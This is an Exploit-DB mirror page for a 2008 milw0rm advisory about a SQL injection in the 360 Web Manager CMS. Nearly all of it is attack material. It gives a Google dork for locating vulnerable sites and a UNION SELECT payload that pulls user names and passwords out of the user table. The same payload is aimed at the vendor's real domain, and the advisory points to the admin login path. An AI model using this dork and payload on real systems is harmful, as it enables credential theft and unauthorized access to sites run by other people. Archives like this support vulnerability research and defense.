exploit-db-mirror/exploits/php/webapps/4944.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
610 B
Text

360 Web Manager CMS Remote SQL Injection Vulnerability
Author: Ded MustD!e
Site: http://www.360webmanager.com/
Google Dork: inurl:"IDFM=" "form.php"
Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*
Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4
,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/* =)))
Details: number of columns may be >20, admin panel - http://www.site.com/adm/login.php
# milw0rm.com [2008-01-20]